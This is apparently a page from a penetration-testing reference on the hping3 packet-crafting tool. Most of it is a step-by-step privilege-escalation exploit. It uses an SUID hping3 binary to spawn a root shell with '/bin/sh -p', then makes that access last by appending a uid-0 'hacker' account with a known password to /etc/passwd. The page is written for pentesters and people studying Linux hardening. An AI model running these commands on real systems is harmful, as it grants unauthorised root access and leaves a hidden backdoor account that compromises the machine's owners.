Hping3

hping3 is a network testing tool used for crafting and sending custom TCP/IP packets. It supports TCP, UDP, ICMP, and RAW-IP protocols, allowing precise control over packet headers. Unlike standard tools like ping, hping3 enables advanced manipulation of traffic for in-depth network analysis and security assessment.

hping3 can be leveraged to gain access to sensitive files or escalate to a root shell :

Escalate to root in a not fully interactive shell (source):

$ find / -type f -perm -u=s 2>/dev/null
/usr/sbin/hping3

$ /usr/sbin/hping3
hping3> /bin/sh -p
# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

A new root user can be created to gain a fully interactive shell:

# Create a hash
$ openssl passwd -1 -salt hacker pass123
$1$hacker$zVnrpoW2JQO5YUrLmAs.o1

# Launch a hping3 shell
$ /usr/sbin/hping3

# Base-64 encode the payload
$ echo 'hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0::/root:/bin/bash' | base64
aGF...<SNIP>...oCg==

hping3> echo "aGF...<SNIP>...oCg==" | base64 -d >> /etc/passwd

hping3> su hacker
Password: pass123

# id
uid=0(root) gid=0(root) groups=0(root)

PreviousGcore Nextmake

Last updated 6 days ago

Was this helpful?